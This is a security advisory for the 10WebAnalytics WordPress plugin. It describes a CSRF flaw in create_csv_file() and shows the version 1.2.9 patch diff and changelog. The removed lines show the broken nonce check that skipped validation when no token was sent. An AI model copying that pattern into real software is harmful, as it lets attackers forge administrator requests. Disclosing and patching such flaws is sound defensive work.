The 10WebAnalytics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.8. This is due to missing or incorrect nonce validation on the create_csv_file() function. This makes it possible for unauthenticated attackers to create a CSV file via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**wd-google-analytics/trunk/config.php**

r2154223

r2371142

 

14

14

  define('GAWD\_URL', plugins\_url(plugin\_basename(dirname(\_\_FILE\_\_))));

15

15

  define('GAWD\_INC', GAWD\_URL . '/inc');

16

 

  define('GAWD\_VERSION', '1.2.8');

 

16

  define('GAWD\_VERSION', '1.2.9');

17

17

18

18

  $upload\_dir = wp\_upload\_dir();

**wd-google-analytics/trunk/gawd\_class.php**

r2151404

r2371142

 

304

304

  public function create\_csv\_file(){

305

305

    $response = array();

306

 

    if(isset($\_POST\['security'\]) && !wp\_verify\_nonce($\_POST\['security'\], 'gawd\_admin\_page\_nonce')) {

 

306

    if(!isset($\_POST\['security'\]) || !wp\_verify\_nonce($\_POST\['security'\], 'gawd\_admin\_page\_nonce')) {

307

307

      $response\['error'\]\['code'\] = 'wrong\_nonce';

308

308

      $response\['error'\]\['msg'\] = 'wrong\_nonce';

309

 

      die(json\_encode($response));

310

 

    }

311

 

312

 

    $csv\_response = $this->generate\_csv\_file();

313

 

    $response = array(

314

 

      'success'=> $csv\_response\['success'\],

315

 

      'error' => $csv\_response\['error'\],

316

 

      'data' => $csv\_response\['data'\]

317

 

    );

318

 

 

309

    }

 

310

    else {

 

311

      $csv\_response = $this->generate\_csv\_file();

 

312

      $response\['error'\] = (!empty($csv\_response\['error'\])) ? $csv\_response\['error'\] : '';

 

313

      $response\['success'\] = (!empty($csv\_response\['success'\])) ? $csv\_response\['success'\] : '';

 

314

      $response\['data'\] = (!empty($csv\_response\['data'\])) ? $csv\_response\['data'\] : '';

 

315

    }

319

316

    die(json\_encode($response));

320

317

  }

…

…

 

342

339

    );

343

340

344

 

    if(isset($\_POST\['security'\]) && !wp\_verify\_nonce($\_POST\['security'\], 'gawd\_admin\_page\_nonce')) {

 

341

    if(!isset($\_POST\['security'\]) || !wp\_verify\_nonce($\_POST\['security'\], 'gawd\_admin\_page\_nonce')) {

345

342

      $response\['error'\]\['code'\] = 'wrong\_nonce';

346

343

      $response\['error'\]\['msg'\] = 'wrong\_nonce';

…

…

 

352

349

      }

353

350

    }

354

 

355

 

356

 

    include\_once 'library/gawd-email-class.php';

357

 

    $email = new GAWD\_email();

358

 

    if($email->parse\_ajax\_data() === false) {

359

 

      $response\['error'\] = $email->get\_error();

360

 

      if($die == true) {

361

 

        die(json\_encode($response));

362

 

      } else {

363

 

        return $response;

364

 

      }

365

 

    }

366

 

367

 

    $file\_response = $this->generate\_csv\_file();

368

 

    if($file\_response\['success'\] === false) {

369

 

370

 

      $response = array(

371

 

        'success' => $file\_response\['success'\],

372

 

        'error' => $file\_response\['error'\],

373

 

        'data' => $file\_response\['data'\]

374

 

      );

375

 

376

 

      if($die == true) {

377

 

        die(json\_encode($response));

378

 

      } else {

379

 

        return $response;

380

 

      }

381

 

    }

382

 

383

 

384

 

    if($email->get\_period() !== 'once') {

385

 

      $email->save\_email\_info($file\_response\['ajax\_args'\], $file\_response\['csv\_generator'\]);

386

 

387

 

      $response\['success'\] = true;

388

 

      $response\['data'\]\['msg'\] = 'Email successfully Scheduled </br> Go to <a href="admin.php?page=gawd\_settings#gawd\_emails\_tab">Settings page</a> to delete scheduled e-mails.';

389

 

      if($die == true) {

390

 

        die(json\_encode($response));

391

 

      } else {

392

 

        return $response;

393

 

      }

394

 

    }

395

 

396

 

    $email->attach\_file($file\_response\['csv\_generator'\]);

397

 

    if($email->send\_mail() === true) {

398

 

      $response\['success'\] = true;

399

 

      $response\['data'\]\['msg'\] = 'Email successfully sent.';

400

 

      if($die == true) {

401

 

        die(json\_encode($response));

402

 

      } else {

403

 

        return $response;

404

 

      }

405

 

    } else {

406

 

      $response\['error'\]\['code'\] = 'fail\_to\_sent\_email';

407

 

      $response\['error'\]\['code'\] = 'Fail to sent email.';

408

 

409

 

      if($die == true) {

410

 

        die(json\_encode($response));

411

 

      } else {

412

 

        return $response;

413

 

      }

414

 

    }

415

 

 

351

    else {

 

352

      include\_once 'library/gawd-email-class.php';

 

353

      $email = new GAWD\_email();

 

354

      if($email->parse\_ajax\_data() === false) {

 

355

        $response\['error'\] = $email->get\_error();

 

356

        if($die == true) {

 

357

          die(json\_encode($response));

 

358

        } else {

 

359

          return $response;

 

360

        }

 

361

      }

 

362

 

363

      $file\_response = $this->generate\_csv\_file();

 

364

      if($file\_response\['success'\] === false) {

 

365

 

366

        $response = array(

 

367

          'success'=> $file\_response\['success'\],

 

368

          'error' => $file\_response\['error'\],

 

369

          'data' => $file\_response\['data'\]

 

370

        );

 

371

 

372

        if($die == true) {

 

373

          die(json\_encode($response));

 

374

        } else {

 

375

          return $response;

 

376

        }

 

377

      }

 

378

 

379

 

380

      if($email->get\_period() !== 'once') {

 

381

        $email->save\_email\_info($file\_response\['ajax\_args'\], $file\_response\['csv\_generator'\]);

 

382

 

383

        $response\['success'\] = true;

 

384

        $response\['data'\]\['msg'\] = 'Email successfully Scheduled </br> Go to <a href="admin.php?page=gawd\_settings#gawd\_emails\_tab">Settings page</a> to delete scheduled e-mails.';

 

385

        if($die == true) {

 

386

          die(json\_encode($response));

 

387

        } else {

 

388

          return $response;

 

389

        }

 

390

      }

 

391

 

392

      $email->attach\_file($file\_response\['csv\_generator'\]);

 

393

      if($email->send\_mail() === true){

 

394

        $response\['success'\] = true;

 

395

        $response\['data'\]\['msg'\] = 'Email successfully sent.';

 

396

        if($die == true) {

 

397

          die(json\_encode($response));

 

398

        } else {

 

399

          return $response;

 

400

        }

 

401

      }else{

 

402

        $response\['error'\]\['code'\] = 'fail\_to\_sent\_email';

 

403

        $response\['error'\]\['code'\] = 'Fail to sent email.';

 

404

 

405

        if($die == true) {

 

406

          die(json\_encode($response));

 

407

        } else {

 

408

          return $response;

 

409

        }

 

410

      }

 

411

    }

416

412

  }

417

413

**wd-google-analytics/trunk/google-analytics-wd.php**

r2214210

r2371142

 

3

3

 \* Plugin Name:     10WebAnalytics

4

4

 \* Plugin URI:      https://10web.io/plugins/wordpress-google-analytics/

5

 

 \* Version:         1.2.8

 

5

 \* Version:         1.2.9

6

6

 \* Author:          10Web

7

7

 \* Author URI:      https://10web.io/plugins/

**wd-google-analytics/trunk/readme.txt**

r2214210

r2371142

 

2

2

Contributors: 10web

3

3

Requires at least: 3.9

4

 

Tested up to: 5.1

5

 

Stable tag: 1.2.8

 

4

Tested up to: 5.5

 

5

Stable tag: 1.2.9

6

6

License: GPLv2 or later

7

7

License URI: http://www.gnu.org/licenses/gpl-2.0.html

…

…

 

23

23

24

24

https://www.youtube.com/watch?v=n1f7ECVFNPI

 

25

 

26

\== Changelog ==

 

27

 

28

\= 1.2.9 =

 

29

\* Fixed: Vulnerability.

 

30

 

31

\= 1.2.8 =

 

32

\* Fixed: Security issues.

 

33

\* Changed: Bootstrap library version

 

34

 

35

\= 1.2.4 =

 

36

\* Changed: Links to 10Web.io.

 

37

 

38

\= 1.2.3 =

 

39

\* Added: Alerts functionality

 

40

\* Added: Emails functionality

 

41

\* Fixed: Exclude tracking for user

 

42

 

43

\= 1.2.2 =

 

44

\* Fixed: Use of deprecated function in PHP 7.2

 

45

\* Fixed: Notices in custom reports page

 

46

 

47

\= 1.2.1 =

 

48

\* Fixed: PHP error if PHP version < 5.5

 

49

 

50

\= 1.2.0 =

 

51

\* Improved: Plugin core functionality is rewritten. The plugin is faster and consumes less memory now.

 

52

\* Improved: Google API client library is used in non-conflicting way.

 

53

\* Improved: The size of the plugin is smaller now due to stripped version of Google library

 

54

\* Improved: Better UX: some menues of the plugin are hidden when plugin has not been configured properly.

 

55

\* Improved: UX when using custom client ID and secret

 

56

\* Improved: New UI of reports, charts and tables

 

57

\* Fixed: Security issues

 

58

\* Fixed: Compatibility issues with Yoast SEO and UpdraftPlus plugins

 

59

\* Fixed: Error notices if no web-property or multiple web-properties correspond to current site

 

60

\* Fixed: Reports for page/post and frontend templates in metaboxes, admin bar, admin list screens and widget

 

61

\* Fixed: User roles management

 

62

\* Fixed: PHP error in admin reports for ecommerce

 

63

\* Fixed: Numerous minor bugs

 

64

\* Changed: Tracking settings are moved to settings page, as a separate tab

 

65

\* Changed: Widgets options

 

66

\* Changed: Emails, alerts, pushover and export features are temporary disabled

 

67

 

68

\= 1.1.8 =

 

69

\* Changed: Changed: Introducing brand new free plugin: SEO by 10Web.

 

70

 

71

\= 1.1.7 =

 

72

\* Changed: Deactivation popup.

 

73

 

74

\= 1.1.6 =

 

75

\* Added: Links to Reviews and Support Forum

 

76

 

77

\= 1.1.5 =

 

78

\* Fixed: PHP 5.4.0 compatibility

 

79

 

80

 

81

\= 1.1.4 =

 

82

\* Fixed: Compatibility issues with Constant Contact Forms, Updraftplus, Image Optimizer WD, Backup WD and some other plugins

 

83

\* Fixed: JS errors on page/post editor

 

84

\* Fixed: Old user account data partially preserved after reauthorization and uninstall

 

85

 

86

\= 1.1.3 =

 

87

\* Fixed: Empty settings page when plugin has token but accounts data lost for some reason

 

88

\* Changed: Show notification to install Backup WD plugin only on plugin pages.

 

89

 

90

\= 1.1.2 =

 

91

\* Fixed: Conflict with some other plugins using Google API PHP library

 

92

\* Fixed: Unable to authorize again after logout

 

93

\* Fixed: JS errors on page/post editor if user not authenticated

 

94

\* Change: Introducing Backup WD plugin

 

95

 

96

\= 1.1.1 =

 

97

\* Fixed: Reports for pages/posts in metabox

 

98

\* Fixed: Multiple requests to Web-Dorado API for updates (Pro)

 

99

\* Fixed: Multiple requests to Google Analytics API for management accounts

 

100

\* Fixed: PHP 5.4.0 compatibility

 

101

\* Changed: WD library initialization

 

102

 

103

\= 1.1.0 =

 

104

\* Changed: Improved UX of authentication   

 

105

\* Changed: Google API PHP Client library updated to the latest 2.2.0 version   

 

106

\* Changed: WD library updated to version 1.0.10   

 

107

\* Fixed: Fatal errors when WordPress could not establish secure connection with Google Analytics API   

 

108

\* Fixed: VanillaJS tracking code instead of jQuery   

 

109

\* Fixed: Escaping of custom tracking code   

 

110

\* Fixed: PHP notices in pages without global $post variable   

 

111

 

112

\= 1.0.22 =

 

113

\* Changed: We temporarily disabled reports in admin dashboard and mailing

 

114

 

115

\= 1.0.21 =

 

116

\* Fixed: Network activation   

 

117

 

118

\= 1.0.20 =

 

119

\* Fixed: Admin styles conflict because of bootstrap.css   

 

120

 

121

\= 1.0.19 =

 

122

\* Changed: Show web-property-related message only in analytics page   

 

123

\* Fixed: Style conflict with jquery-ui.css   

 

124

\* Fixed: Error on PHP4   

 

125

 

126

\= 1.0.18 =

 

127

\* Fixed: Bug on city/pageview report   

 

128

 

129

\= 1.0.17 =

 

130

\* Added: Overview page   

 

131

\* Removed: Featured Plugins, Featured Themes pages   

 

132

 

133

\= 1.0.16 =

 

134

\* Fixed: Bug on pagePath   

 

135

\* Changed: Message about deleted web property   

 

136

 

137

\= 1.0.15 =

 

138

\* Fixed: Bug on date picker   

 

139

\* Changed: Improved error handling   

 

140

\* Added: New featured plugins   

 

141

 

142

\= 1.0.14 =

 

143

\* Fixed: Analytics back end menu position conflict   

 

144

\* Fixed: Bug on deleted property check   

 

145

\* Added: Error log   

 

146

 

147

\= 1.0.13 =

 

148

\* Fixed: Bug on Custom code option in tracking   

 

149

 

150

\= 1.0.12 =

 

151

\* Fixed: Bug on report by individual post/page   

 

152

 

153

\= 1.0.11 =

 

154

\* Added: Custom code option in tracking   

 

155

 

156

\= 1.0.10 =

 

157

\* Fixed: Bug on sending a report to an email once   

 

158

\* Changed: New logo in dashboard menu and notices   

 

159

\* Fixed: Width issue with some reports   

 

160

 

161

 

162

\= 1.0.9 =

 

163

\* Added: Option to select the time of the day for scheduled emails   

 

164

\* Changed: Save authenticate code with enter button   

 

165

\* Changed: Select permissions for user groups in a pop-up (Settings page)   

 

166

\* Fixed: minor bugs   

 

167

 

168

\= 1.0.8 =

 

169

\* Added: Google Analytics reports for custom post types   

 

170

\* Added: New icon in the menu   

 

171

\* Added: New header on WordPress.org     

 

172

\* Fixed: JS error on creating new pages/posts   

 

173

 

174

\= 1.0.7 =

 

175

\* Fixed: Bug in Site Content reports   

 

176

 

177

\= 1.0.6 =

 

178

\* Fixed: User guide links   

 

179

\* Fixed: Bug on datepicker   

 

180

\* Fixed: Error when deleting the web property   

 

181

\* Added: Validation on the form for adding goals   

 

182

 

183

\= 1.0.5 =

 

184

\* Fixed: PHP version conflict   

 

185

\* Added: Pro flags about additional functionality available in Pro version   

 

186

\* Added: Explanation texts and links to documentation on several pages   

 

187

 

188

\= 1.0.4 =

 

189

\* Fixed: Unauthenticate issue   

 

190

\* Fixed: Errors for php version < 5.3   

 

191

 

192

\= 1.0.3 =

 

193

\* Fixed: Front reports permissions     

 

194

\* Fixed: Analytics menu   

 

195

\* Fixed: Redirect to settings page if no profile added   

 

196

 

197

\= 1.0.2 =

 

198

\* Changed: Site speed and Sales performance reports sorting   

 

199

 

200

\= 1.0.1 =

 

201

\* Changed: Reports default sorting   

 

202

 

203

\= 1.0.0 =

 

204

\* Initial version

Tag

#google